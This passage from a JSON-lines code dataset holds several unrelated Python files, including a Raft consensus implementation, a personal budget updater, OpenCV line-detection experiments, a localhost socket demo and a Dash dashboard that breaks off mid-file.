)\n","repo_name":"JetsGame/CycleJet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"13511012330","text":"class Solution:\n def condition(self, s, t):\n for key in t.keys():\n if s.get(key, 0) < t[key]:\n return False\n return True\n \n def minWindow(self, s: str, t: str) -> str:\n if len(t) > len(s):\n return \"\"\n \n target = {}\n currWindow = {}\n for i in t:\n target[i] = 1 + target.get(i, 0)\n l, r = 0, 0\n fin_min = len(s)\n res = \"\"\n while r < len(s):\n currWindow[s[r]] = 1 + currWindow.get(s[r], 0)\n while (self.condition(currWindow, target)):\n if fin_min >= (r - l + 1):\n res = s[l:r+1]\n fin_min = r - l + 1\n currWindow[s[l]] -= 1\n l += 1\n r += 1\n return res","repo_name":"Sudheeradh/neetcode-solutions-old","sub_path":"Sliding Window/Minimum Window Substring.py","file_name":"Minimum Window Substring.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29082270845","text":"__author__ = \"Mark Sattolo\"\n__author_email__ = \"epistemik@gmail.com\"\n__created__ = \"2019-04-13\"\n__updated__ = \"2022-01-04\"\n\nfrom updateAssets import ASSETS_DATA, ASSET_COLS\nfrom updateBudget import *\n\nbase_run_file = get_base_filename(__file__)\n\nBALANCE_DATA = {\n # first data row in the sheet\n BASE_ROW : 4 ,\n # first variable year in google sheet\n BASE_YEAR : 2008 ,\n # NO QUARTER DATA in BALANCE SHEET\n # number of rows to same quarter in adjacent year, NOT INCLUDING header rows\n YEAR_SPAN : 1 ,\n # number of rows to adjacent quarter in the same year\n QTR_SPAN : 0 ,\n # number of years between header rows\n HDR_SPAN : 8\n}\n\nBASE_TOTAL_WORTH_ROW:int = 33\nBASE_MTHLY_ROW:int = BASE_TOTAL_WORTH_ROW - 1\n\n# path to the accounts in the Gnucash file\nBALANCE_ACCTS = {\n HOUSE : [FAM, HOUSE] ,\n LIAB : [FAM, LIAB] ,\n TRUST : [TRUST] ,\n CHAL : [CHAL] , # chalet\n FAM : [FAM] , # family\n INVEST : [FAM, INVEST] ,\n LIQ : [FAM, LIQ] , # Liquid\n PM : [FAM, PM] , # Precious Metals\n REW : [FAM, REW] , # Rewards\n LOAN : [FAM, LOAN]\n}\n\n# column index in the Google sheets\nBAL_MTHLY_COLS = {\n LIAB : {YR: 'U', MTH: 'L'},\n DATE : 'E' ,\n TIME : 'F' ,\n TODAY: 'C' ,\n FAM : 'K' ,\n MTH : 'I'\n}\n\n# cell locations in the Google file\nBAL_TODAY_RANGES = {\n HOUSE : BASE_TOTAL_WORTH_ROW + 6 ,\n LIAB : BASE_TOTAL_WORTH_ROW + 8 ,\n TRUST : BASE_TOTAL_WORTH_ROW + 1 ,\n CHAL : BASE_TOTAL_WORTH_ROW + 2 ,\n FAM : BASE_TOTAL_WORTH_ROW + 7\n}\n\n\nclass UpdateBalance(UpdateBudget):\n \"\"\"Take data from a Gnucash file and update a Balance tab of my Google Budget-Quarterly document.\"\"\"\n def __init__(self, args:list, p_logname:str):\n super().__init__(args, p_logname)\n\n # Google sheet to update\n self.dest = BAL_2_SHEET\n if '1' in self.mode:\n self.dest = BAL_1_SHEET\n self._lgr.debug(F\"dest = {self.dest}\")\n\n self._gnc_session = None\n\n # NO saved gnc data for Balance\n self.save_gnc = False\n\n def get_balance(self, bal_path:list, p_date:date) -> Decimal:\n return self._gnc_session.get_total_balance(bal_path, p_date)\n\n def fill_today(self):\n \"\"\"Get Balance data for TODAY: LIABS, House, FAMILY, CHALET, TRUST.\"\"\"\n self._lgr.debug(get_current_time())\n # calls using 'today' ARE NOT off by one day??\n tdate = now_dt - ONE_DAY\n asset_sums = {}\n for item in BALANCE_ACCTS:\n acct_sum = self.get_balance(BALANCE_ACCTS[item], tdate)\n if item == TRUST:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n elif item == CHAL:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n elif item == HOUSE:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n elif item == LIAB:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n else:\n # need family assets EXCLUDING the previous items, which are reported separately\n asset_sums[item] = acct_sum\n\n # report the family amount as the sum of the individual accounts\n family_sum = \"= \" + str(asset_sums[INVEST]) + \" + \" + str(asset_sums[LIQ]) + \" + \" + str(asset_sums[LOAN]) + \" + \" + str(asset_sums[REW]) \\\n + \" + \" + str(asset_sums[PM])\n self._lgr.debug(F\"Adjusted assets on {now_dt} = '{family_sum}'\")\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[FAM], family_sum)\n\n # TODO: fill in reference for Assets for div-3 months in K row\n def fill_current_year(self):\n \"\"\"\n CURRENT YEAR: fill_today() AND: LIABS for ALL completed month_ends;\n FAMILY for ALL 'non-div-3' completed month_ends in year\n \"\"\"\n self.fill_today()\n self._lgr.debug(get_current_time())\n\n for i in range(now_dt.month - 1):\n month_end = date(now_dt.year, i + 2, 1) - ONE_DAY\n self._lgr.debug(F\"month_end = {month_end}\")\n\n row = BASE_MTHLY_ROW + month_end.month\n # fill LIABS\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], month_end)\n self.fill_google_cell(BAL_MTHLY_COLS[LIAB][MTH], row, liab_sum)\n\n # fill ASSETS for months NOT covered by the Assets sheet\n if month_end.month % 3 != 0:\n acct_sum = self.get_balance(BALANCE_ACCTS[FAM], month_end)\n adjusted_assets = acct_sum - liab_sum\n self._lgr.debug(F\"Adjusted assets on {month_end} = {adjusted_assets.to_eng_string()}\")\n self.fill_google_cell(BAL_MTHLY_COLS[FAM], row, adjusted_assets)\n else:\n self._lgr.debug(\"Update reference to Assets sheet for Mar, June, Sep or Dec\")\n # have to update the CELL REFERENCE to current year/qtr ASSETS\n year_row = ASSETS_DATA[BASE_ROW] \\\n + year_span( now_dt.year, ASSETS_DATA[BASE_YEAR], ASSETS_DATA[YEAR_SPAN], ASSETS_DATA[HDR_SPAN],\n self._lgr )\n int_qtr = (month_end.month // 3) - 1\n self._lgr.debug(F\"int_qtr = {int_qtr}\")\n dest_row = year_row + (int_qtr * ASSETS_DATA.get(QTR_SPAN))\n val_num = '1' if '1' in self.dest else '2'\n value = \"='Assets \" + val_num + \"'!\" + ASSET_COLS[TOTAL] + str(dest_row)\n self.fill_google_cell(BAL_MTHLY_COLS[FAM], row, value)\n\n # fill DATE for month column\n self.fill_google_cell(BAL_MTHLY_COLS[MTH], row, str(month_end))\n\n def fill_previous_year(self):\n \"\"\"\n PREVIOUS YEAR: LIABS for ALL NON-completed months;\n FAMILY assets for ALL 'non-div-3' NON-completed months in year\n \"\"\"\n self._lgr.debug(get_current_time())\n\n year = now_dt.year - 1\n for mth in range(12 - now_dt.month):\n dte = date(year, mth + now_dt.month + 1, 1) - ONE_DAY\n self._lgr.debug(F\"date = {dte}\")\n\n row = BASE_MTHLY_ROW + dte.month\n # fill LIABS\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], dte)\n self.fill_google_cell(BAL_MTHLY_COLS[LIAB][MTH], row, liab_sum)\n\n # fill ASSETS for months NOT covered by the Assets sheet\n if dte.month % 3 != 0:\n acct_sum = self.get_balance(BALANCE_ACCTS[FAM], dte)\n adjusted_assets = acct_sum - liab_sum\n self._lgr.debug(F\"Adjusted assets on {dte} = ${adjusted_assets.to_eng_string()}\")\n self.fill_google_cell(BAL_MTHLY_COLS[FAM], row, adjusted_assets)\n\n # fill the date in Month column\n self.fill_google_cell(BAL_MTHLY_COLS[MTH], row, str(dte))\n\n year_end = date(year, 12, 31)\n row = BASE_MTHLY_ROW + 12\n # fill the year-end date in Month column\n self.fill_google_cell(BAL_MTHLY_COLS[MTH], row, str(year_end))\n\n # LIABS entry for year end\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], year_end)\n # month column\n self.fill_google_cell(BAL_MTHLY_COLS[LIAB][MTH], row, liab_sum)\n # year column\n self.fill_year_end_liabs(year)\n\n def fill_year_end_liabs(self, year:int):\n year_end = date(year, 12, 31)\n self._lgr.debug(F\"year_end = {year_end}\")\n\n # fill LIABS\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], year_end)\n yr_span = year_span( year, BALANCE_DATA[BASE_YEAR], BALANCE_DATA[YEAR_SPAN], BALANCE_DATA[HDR_SPAN] )\n self.fill_google_cell( BAL_MTHLY_COLS[LIAB][YR], BALANCE_DATA[BASE_ROW] + yr_span, str(liab_sum) )\n\n def fill_gnucash_data(self, p_session:GnucashSession, p_qtr:int, p_year:str, data_qtr:dict):\n self._gnc_session = p_session\n\n def fill_google_cell(self, p_col:str, p_row:int, p_val:FILL_CELL_VAL):\n self._ggl_update.fill_cell(self.dest, p_col, p_row, p_val)\n\n def fill_google_data(self, p_years:list):\n \"\"\"\n for each of the specified years:\n IF CURRENT YEAR: TODAY & LIABS for ALL completed months; FAMILY for ALL non-3 completed months in year\n Balance data for TODAY: LIABS, House, FAMILY, XCHALET, TRUST\n IF PREVIOUS YEAR: LIABS for ALL NON-completed months; FAMILY for ALL non-3 NON-completed months in year\n \"\"\"\n self._lgr.info(F\"timespan = {p_years}\\n\")\n\n for yr in p_years:\n year = get_int_year( yr, BALANCE_DATA[BASE_YEAR] )\n if year == now_dt.year:\n self.fill_current_year()\n elif now_dt.year - 1 == year:\n self.fill_previous_year()\n else:\n self.fill_year_end_liabs(year)\n\n# END class UpdateBalance\n\n\ndef update_balance_main(args:list) -> dict:\n balance = UpdateBalance(args, base_run_file)\n return balance.go()\n\n\nif __name__ == \"__main__\":\n update_balance_main(argv[1:])\n exit()\n","repo_name":"EpistemikPython/UpdateBudgetQtrly","sub_path":"updateBalance.py","file_name":"updateBalance.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23177742534","text":"import asyncio\nimport random\n\nimport logging\nfrom .log import Log\nfrom .timer import Timer\n\n\nclass BaseState(object):\n\n def __init__(self, server):\n self.server = server\n self.log = Log()\n self.leader = None\n # latest term server has seen (initialized to 0 increases monotonically)\n self.term = 0\n # candidate_id that received vote in current term (or None)\n self.voted_for = None\n\n def set_leader(self, new_leader):\n self.leader = new_leader\n\n def on_receive_request_vote(self, data):\n \"\"\"RequestVote RPC — invoked by Candidate to gather votes\n Arguments:\n term — candidate’s term\n candidate_id — candidate requesting vote\n last_log_index — index of candidate’s last log entry\n last_log_term — term of candidate’s last log entry\n\n Results:\n term — for candidate to update itself\n vote_granted — True means candidate received vote\n\n Receiver implementation:\n 1. Reply False if term < self term\n 2. If voted_for is None or candidateId ????,\n and candidate’s log is at least as up-to-date as receiver’s log,\n grant vote\n \"\"\"\n\n def on_receive_request_vote_response(self, data):\n \"\"\"RequestVote RPC response — description above\"\"\"\n\n def on_receive_append_entries(self, data):\n \"\"\"AppendEntries RPC — replicate log entries / heartbeat\n Arguments:\n term — leader’s term\n leader_id — so follower can redirect clients\n prev_log_index — index of log entry immediately preceding new ones\n prev_log_term — term of prev_log_index entry\n entries[] — log entries to store (empty for heartbeat)\n commit_index — leader’s commit_index\n\n Results:\n term — for leader to update itself\n success — True if follower contained entry matching prev_log_index\n and prev_log_term\n\n Receiver implementation:\n 1. Reply False if term < self term\n 2. Reply False if log entry term at prev_log_index doesn't match\n prev_log_term\n 3. If an existing entry conflicts with a new one, delete the entry\n and following entries\n 4. Append any new entries not already in the log\n 5. If leader_commit > commit_index, set commit_index =\n min(leader_commit, index of last new entry)\n \"\"\"\n\n def on_receive_append_entries_response(self, data):\n \"\"\"AppendEntries RPC response — description above\"\"\"\n\n def request_handler(self, data):\n \"\"\"Dynamically determine the request handler by request type\"\"\"\n func = getattr(self, 'on_receive_{}'.format(data['type']))\n # logging.debug('%s handling %s', func, data)\n func(data)\n\n\nclass Follower(BaseState):\n \"\"\"Raft Follower\n\n — Respond to RPCs from candidates and leaders\n — If election timeout elapses without receiving AppendEntries RPC from\n current leader or granting vote to candidate: convert to candidate\n \"\"\"\n\n def __init__(self, server):\n super().__init__(server)\n self.election_timer = Timer(self.election_interval, self.start_election,\n self.server.loop)\n\n def start(self):\n self.election_timer.start()\n\n def stop(self):\n self.election_timer.stop()\n\n @property\n def election_interval(self):\n return random.uniform(150, 300)\n\n def on_receive_append_entries(self, data):\n self.set_leader(data['leader_id'])\n\n # Reply False if log does not contain an entry at pre_log_idx\n # whose term matches prev_log_term\n pre_log_idx = data['prev_log_index']\n try:\n if (pre_log_idx and pre_log_idx > self.log.last_log_index) \\\n or (pre_log_idx and self.log[pre_log_idx]['term'] !=\n data['prev_log_term']):\n response = {\n 'type': 'append_entries_response',\n 'term': self.term,\n 'success': False,\n 'request_id': data['request_id']\n }\n asyncio.ensure_future(\n self.server.send(response, data['sender']),\n loop=self.server.loop)\n return\n except IndexError:\n pass\n\n # If an existing entry conflicts with a new one (same index but\n # different terms), delete the existing entry and all that follow it\n new_index = data['prev_log_index'] + 1\n try:\n if self.log[new_index]['term'] != data['term'] or (\n self.log.last_log_index != pre_log_idx\n ):\n self.log.erase_from(new_index)\n except IndexError:\n pass\n\n # It's always one entry for now\n self.log.add_entries(data['entries'])\n\n # Update commit index if necessary\n if self.log.commit_index < data['commit_index']:\n self.log.commit_index = min(data['commit_index'],\n self.log.last_log_index)\n\n # Return True since entry matching pre_log_idx and prev_log_term\n # was found\n response = {\n 'type': 'append_entries_response',\n 'term': self.term,\n 'success': True,\n 'last_log_index': self.log.last_log_index,\n 'request_id': data['request_id']\n }\n asyncio.ensure_future(self.server.send(response, data['sender']),\n loop=self.server.loop)\n\n self.election_timer.reset()\n\n def on_receive_request_vote(self, data):\n if self.voted_for is None and not data['type'].endswith('_response'):\n\n # If the logs have last entries with different terms,\n # then the log with the later term is more up-to-date.\n # If the logs end with the same term, then whichever log is longer\n # is more up-to-date.\n\n # Candidates' log has to be up-to-date\n if data['last_log_term'] != self.log.last_log_term:\n up_to_date = data['last_log_term'] > self.log.last_log_term\n else:\n up_to_date = data['last_log_index'] >= self.log.last_log_index\n\n if up_to_date:\n self.voted_for = data['candidate_id']\n\n response = {\n 'type': 'request_vote_response',\n 'term': self.term,\n 'vote_granted': up_to_date\n }\n\n asyncio.ensure_future(self.server.send(response, data['sender']),\n loop=self.server.loop)\n\n def start_election(self):\n self.server.to_candidate()\n\n\nclass Candidate(BaseState):\n \"\"\"Raft Candidate\n — On conversion to candidate, start election:\n — Increment self term\n — Vote for self\n — Reset election timer\n — Send RequestVote RPCs to all other servers\n — If votes received from majority of servers: become leader\n — If AppendEntries RPC received from new leader: convert to follower\n — If election timeout elapses: start new election\n \"\"\"\n\n def __init__(self, server):\n super().__init__(server)\n self.election_timer = Timer(self.election_interval,\n self.server.to_follower,\n self.server.loop)\n self.vote_count = 0\n\n def start(self):\n \"\"\"Increment current term, vote for herself & send vote requests\"\"\"\n self.term += 1\n self.voted_for = self.server.id\n\n self.vote_count = 1\n self.request_vote()\n self.election_timer.start()\n\n def stop(self):\n self.election_timer.stop()\n\n def request_vote(self):\n \"\"\"RequestVote RPC — gather votes\n Arguments:\n term — candidate’s term\n candidate_id — candidate requesting vote\n last_log_index — index of candidate’s last log entry\n last_log_term — term of candidate’s last log entry\n \"\"\"\n data = {\n 'type': 'request_vote',\n 'term': self.term,\n 'candidate_id': self.server.id,\n 'last_log_index': self.log.last_log_index,\n 'last_log_term': self.log.last_log_term\n }\n if self.server.cluster_count > 1:\n self.server.broadcast(data)\n else:\n self.server.to_leader()\n\n def on_receive_request_vote_response(self, data):\n \"\"\"Receives response for vote request.\n If the vote was granted then check if we got majority and may\n becomeLeader\n \"\"\"\n if data.get('vote_granted'):\n self.vote_count += 1\n if self.server.is_majority(self.vote_count):\n self.server.to_leader()\n\n def on_receive_append_entries(self, data):\n \"\"\"If we discover a Leader with the same term — step down\"\"\"\n if self.term == data['term']:\n self.server.to_follower()\n response = {\n 'type': 'append_entries_response',\n 'term': self.term,\n 'success': True,\n 'last_log_index': self.log.last_log_index,\n 'request_id': data['request_id']\n }\n asyncio.ensure_future(self.server.send(response, data['sender']),\n loop=self.server.loop)\n\n self.election_timer.reset()\n\n @property\n def election_interval(self):\n return random.uniform(150, 300)\n\n\nclass Leader(BaseState):\n \"\"\"Raft Leader\n Upon election: send initial empty AppendEntries RPCs (heartbeat) to\n each server; repeat during idle periods to prevent election timeouts\n\n — If command received from client: append entry to local log, respond after\n entry applied to state machine\n - If last log index ≥ next_index for a follower: send AppendEntries RPC with\n log entries starting at next_index\n — If successful: update next_index and match_index for follower\n — If AppendEntries fails because of log inconsistency:\n decrement next_index and retry\n — If there exists an N such that N > commit_index, a majority of\n match_index[i] ≥ N, and log[N].term == self term: set commit_index = N\n \"\"\"\n\n def __init__(self, server):\n super().__init__(server)\n self.heartbeat_interval = 50\n self.step_down_missed_heartbeats = 8\n self.heartbeat_timer = Timer(self.heartbeat_interval,\n self.heartbeat,\n self.server.loop)\n self.step_down_timer = Timer(\n self.step_down_missed_heartbeats * self.heartbeat_interval,\n self.step_down, self.server.loop)\n # monotonically increasing request id and response of each request\n self.request_id = 0\n self.response_map = {}\n\n def step_down(self):\n logging.warning('%s stepping down', self.server)\n self.server.to_follower()\n\n def start(self):\n self.init_log()\n self.heartbeat_timer.start()\n self.step_down_timer.start()\n\n def stop(self):\n self.heartbeat_timer.stop()\n self.step_down_timer.stop()\n\n def init_log(self):\n self.log.next_index = {\n follower: self.log.last_log_index + 1 for follower in\n self.server.peers\n }\n\n self.log.match_index = {\n follower: 0 for follower in self.server.peers\n }\n\n async def append_entries(self, destination=None):\n \"\"\"AppendEntries RPC — replicate log entries / heartbeat\n Args:\n destination — destination id\n\n Request params:\n term — leader’s term\n leader_id — so follower can redirect clients\n prev_log_index — index of log entry immediately preceding new ones\n prev_log_term — term of prev_log_index entry\n commit_index — leader’s commit_index\n\n entries[] — log entries to store (empty for heartbeat)\n \"\"\"\n # Send AppendEntries RPC to destination if specified or broadcast to\n # everyone\n for dest in destination and [destination] or self.server.peers:\n data = {\n 'type': 'append_entries',\n 'term': self.term,\n 'leader_id': self.server.id,\n 'commit_index': self.log.commit_index,\n 'request_id': self.request_id\n }\n # logging.debug('append_entries %s from %s', data, dest)\n next_index = self.log.next_index[dest]\n prev_index = next_index - 1\n\n if self.log.last_log_index >= next_index:\n data['entries'] = self.log[next_index:]\n else:\n data['entries'] = []\n\n data.update({\n 'prev_log_index': prev_index,\n 'prev_log_term': self.log[prev_index]['term'] if self.log\n and prev_index else 0\n })\n asyncio.ensure_future(self.server.send(data, dest),\n loop=self.server.loop)\n\n def on_receive_append_entries_response(self, data):\n sender_id = data['sender']\n # logging.debug('append_entries_response %s from %s', data, sender_id)\n\n # Count all unique responses per particular heartbeat interval\n # and step down via if leader doesn't get majority of\n # responses for heartbeats\n # import ipdb; ipdb.set_trace()\n if data['request_id'] in self.response_map:\n self.response_map[data['request_id']].add(sender_id)\n answered = len(self.response_map[data['request_id']])\n if self.server.is_majority(answered + 1):\n # logging.debug('leader %s step down reset', self.server.id)\n self.step_down_timer.reset()\n del self.response_map[data['request_id']]\n\n if not data['success']:\n self.log.next_index[sender_id] = \\\n max(self.log.next_index[sender_id] - 1, 1)\n else:\n self.log.next_index[sender_id] = data['last_log_index'] + 1\n self.log.match_index[sender_id] = data['last_log_index']\n self.update_commit_index()\n\n # Send AppendEntries RPC to continue updating fast-forward log\n # (data['success'] == False) or in case there are new entries to sync\n # (data['success'] == data['updated'] == True)\n if self.log.last_log_index >= self.log.next_index[sender_id]:\n host, port = sender_id.split(':')\n addr = (host.strip(), port.strip())\n asyncio.ensure_future(self.append_entries(destination=addr),\n loop=self.server.loop)\n\n def update_commit_index(self):\n committed_on_majority = 0\n for index in range(self.log.commit_index + 1,\n self.log.last_log_index + 1):\n committed_count = len([\n 1 for follower in self.log.match_index\n if self.log.match_index[follower] >= index\n ])\n\n # If index is matched on at least half + self for\n # current term — commit. That may cause commit fails upon restart\n # with stale logs\n is_current_term = self.log[index]['term'] == self.term\n if self.server.is_majority(committed_count + 1) and is_current_term:\n committed_on_majority = index\n else:\n break\n\n if committed_on_majority > self.log.commit_index:\n self.log.commit_index = committed_on_majority\n\n def heartbeat(self):\n self.request_id += 1\n self.response_map[self.request_id] = set()\n logging.debug('%s heart beating, request id: %s', self.server.id, self.request_id)\n asyncio.ensure_future(self.append_entries(), loop=self.server.loop)\n","repo_name":"vitrun/pok","sub_path":"raft/raft/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":16063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"75430937960","text":"\nimport numpy as np\nimport cv2\n\nimg_original = cv2.imread('C:/fleshwoman/Object-detection/image/books.jpg')\n\nimg = img_original.copy()\n\n\n# 1. 이미지 가공하기\n## 1.1 GrayScale로 바꾸고 Blur 처리\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblur1 = cv2.GaussianBlur(gray, (5, 5), 0)\n#edge 보존 but 느리다. 화질 좋을때 text가 잘 잡힘\nblur2 = cv2.bilateralFilter(gray, 9, 75, 75)\n# src: 입력영상\n# d : 필터링에 이용하는 이웃한 픽셀의 지름을 정의, 불가능한 경우 sigmaSpace를 사용함.\n# sigmaColor : 컬러공간의 시그마공간 정의, 클수록 이웃한 픽셀과 기준색상의 영향이 커진다.\n# sigmaSpace : 시그마 필터를 조절한다, 값이 클수록 긴밀하게 주변 픽셀에 영향을 미친다. d > 0 이면 영향을 받지 않고, 그 이외에는 d 값에 비례한다.\n#\n\nblur3 = cv2.medianBlur(gray, 5)\n\n# blur = np.hstack([blur1, blur2, blur3])\n# cv2.namedWindow('blur', cv2.WINDOW_NORMAL)\n# cv2.imshow(\"blur\", blur)\n# cv2.waitKey(0)\n\n\n\n# 1.2. Threshold 적용\n# Threshoding.py에서 확인결과 가장 적합해 보이는 코드\nthr7 = cv2.adaptiveThreshold(blur3, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, -2)\n# cv2.namedWindow('thr', cv2.WINDOW_NORMAL)\n# cv2.imshow(\"thr\", thr7)\n# cv2.waitKey(0)\n\n# closing or open\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n# opened = cv2.morphologyEx(thr7, cv2.MORPH_OPEN, kernel)\nclosed = cv2.morphologyEx(thr7, cv2.MORPH_CLOSE, kernel)\n\n#oc = np.vstack([thr7, closed])\noc = closed\ncv2.namedWindow('oc', cv2.WINDOW_NORMAL)\ncv2.imshow(\"oc\", oc)\ncv2.waitKey(0)\n\n# 2. Edge 검출\n# edges = cv2.Canny(blur, 5, 250)\n# cv2.namedWindow('edges', cv2.WINDOW_NORMAL)\n# cv2.imshow(\"edges\", edges)\n# cv2.waitKey(0)\n#\n#minLineLength : 이 값이하로 떨어진 선 길이는 직선으로 간주하지 않는다.\nminLineLength = 100\n#maxLineGap : 직선이 이 값 이상으로 떨어져 있으면 다른 직선으로 간주한다.\nmaxLineGap = 10\nrho = 1\ntheta = np.pi/180\nthreshold = 200\n\n\nlines = cv2.HoughLinesP(oc, 1, theta, threshold, minLineLength, maxLineGap)\nlines1 = cv2.HoughLinesP(oc, 1, theta, threshold, 100, 5)\nlines2 = cv2.HoughLinesP(oc, 1, theta, threshold, 100, maxLineGap)\nlines3 = cv2.HoughLinesP(oc, 1, theta, 150, 100, 5)\n\nimg1 = img.copy()\nimg2 = img.copy()\nimg3 = img.copy()\n\n\nfor i in range(len(lines)):\n for x1, y1, x2, y2 in lines[i]:\n cv2.line(gray, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\nfor i in range(len(lines1)):\n for x1, y1, x2, y2 in lines1[i]:\n cv2.line(img1, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\nfor i in range(len(lines2)):\n for x1, y1, x2, y2 in lines2[i]:\n cv2.line(img2, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\nfor i in range(len(lines3)):\n for x1, y1, x2, y2 in lines3[i]:\n cv2.line(img3, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\n\n\nrow1 = np.hstack([img, img1])\nrow2 = np.hstack([img2, img3])\nfin = np.vstack([row1, row2])\n\ncv2.namedWindow('fin', cv2.WINDOW_NORMAL)\ncv2.imshow('fin', fin)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n# minLineLength = 500\n# maxLineGap = 10\n# rho = 1\n# # np.pi/180 : 2도 단위이므로 각 픽셀별로 180개의 r,theta가 나온다.\n# theta = np.pi/45\n# # 이미지에 따라 다름..\n# threshold = 100\n# lines = cv2.HoughLines(closed, 1, theta, threshold)\n#\n# for line in lines:\n# for rho,theta in line:\n# a = np.cos(theta)\n# b = np.sin(theta)\n# x0 = a*rho\n# y0 = b*rho\n# x1 = int(x0 + 1000*(-b))\n# y1 = int(y0 + 1000*(a))\n# x2 = int(x0 - 1000*(-b))\n# y2 = int(y0 - 1000*(a))\n# cv2.line(img, (x1, y1), (x2, y2), (255, 0, 0), 2)\n# cropped = img[100:200, 500:640]\n#\n#\n# cv2.imshow('img', img)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n","repo_name":"flashwoman/Object-detection","sub_path":"testfiles_ara/DrawLine.py","file_name":"DrawLine.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33687626551","text":"\"\"\"Lambda functions have no name.\n they must be expressed in one line.\n Keyword lambda is followed by a number of parameters,\n Then a colon and then the expression.\n The output of expression is returned automatically\"\"\"\n\n# A program to return 3x + 1\nf = lambda x: 3*x +1\n\nprint(f(2))\n\n# Combine first & last name into full name\nfull_name = lambda fn, ln: fn.strip().title() +' '+ ln.strip().title()\n\nprint(full_name('KIRAN', 'SaWaNt '))\n\n#__________actual use of a lambda___________#\n#Sorting a list by last name\nnames = [\"H. G. Wells\", \"Issac Asimov\", \"Ray Bradbury\", \"Robert Heinlein\", \"Arthur C. Clarke\", \"Frank Herbert\"]\n\nnames.sort(key=lambda name: name.split(' ')[-1].lower())\nprint(names)\n\n# Function that returns a quadratic equation\ndef build_equation(a, b, c): #Firstclass function\n '''Returns the function f(x) = ax^2 + bx + c'''\n return lambda x: a*x**2 + b*x + c #lambda as a closure\n\nk = build_equation(2, 3, -5)\nprint(k(5)) #arguments passed are assigned to lambda(x)\n\nj = build_equation(3, 0, 1)(2)\nprint(j)","repo_name":"Kiran-Sawant/Python_learning_curve","sub_path":"Used Defined Functions/lambda functions.py","file_name":"lambda functions.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18470436436","text":"__author__ = 'Administrator'\n\n\"this is a socket client demonstrates\"\n\nimport socket, glob\n\ns = socket.socket()\n\ns.connect((\"127.0.0.1\", 50007)) # socketServerDemo must execute first\n\n\n\nfor file in glob.glob('*.py'):\n with open(file, 'r') as handle:\n for line in handle:\n s.send(line.encode('utf-8'))\nwhile True:\n data = s.recv(100)\n\n print(list(bytearray(data)))\n print(not data)\ns.close()\n\n","repo_name":"loovien/pythonstudy","sub_path":"socketDemo/socketClientDemo.py","file_name":"socketClientDemo.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33417787362","text":"import os, redis, subprocess\n\nr = redis.Redis(\nhost='redis-master.redis.svc.cluster.local',\nport=6379)\nnode = os.getenv(\"NODE_NAME\")\ntry:\n numa_output = subprocess.check_output(['numalign'], shell=True)\n if 'true' in numa_output.decode('utf-8'):\n if not r.exists('aligned_count'):\n r.set('aligned_count', 0)\n r.incr('aligned_count')\n if not r.exists(node):\n r.set(node, 0)\n r.incr(node)\nexcept Exception as e:\n if not r.exists('unaligned_count'):\n r.set('unaligned_count', 0)\n r.incr('unaligned_count')\n","repo_name":"mukrishn/openshift-testing","sub_path":"scripts/numalign/redis-client.py","file_name":"redis-client.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"71404821538","text":"# Run this app with `python app.py` and\n# visit http://127.0.0.1:8050/ in your web browser.\nimport json\nfrom dash import Dash, html, dcc, Output, Input, dash_table\nimport plotly.express as px\nimport pandas as pd\nimport requests\nfrom dotenv import load_dotenv\nimport os\nimport dash_bootstrap_components as dbc\nfrom plotly.subplots import make_subplots\nfrom supabase import create_client, Client\nimport plotly.graph_objects as go\n\n\nload_dotenv()\n\napp = Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\n\n# Instantiate the client with an endpoint.\nurl = os.getenv(\"SUPABASE_URL\")\nkey = os.getenv(\"SUPABASE_KEY\")\n\n# data = requests.get(f\"{url}/rest/v1/stats?select=*,teams(team_name)\", headers={'apikey': key}).json()\n# flatten the json\n# data = [dict(**d, **d.pop('teams')) for d in data]\n\n# df = pd.DataFrame(data)\ndf = pd.read_csv('../data/processed_stats.csv')\ndf = df.rename(columns={'team': 'team_name'})\n\nfig_goals = px.bar(df, x=\"team_name\", y=[\"goals\", 'goals_against'], barmode=\"group\",\n labels={'goals': 'Goals', 'goals_against': 'Goals Against'})\n\nfig_penalties = px.bar(df, x=\"team_name\", y=['powerplay', 'boxplay'], 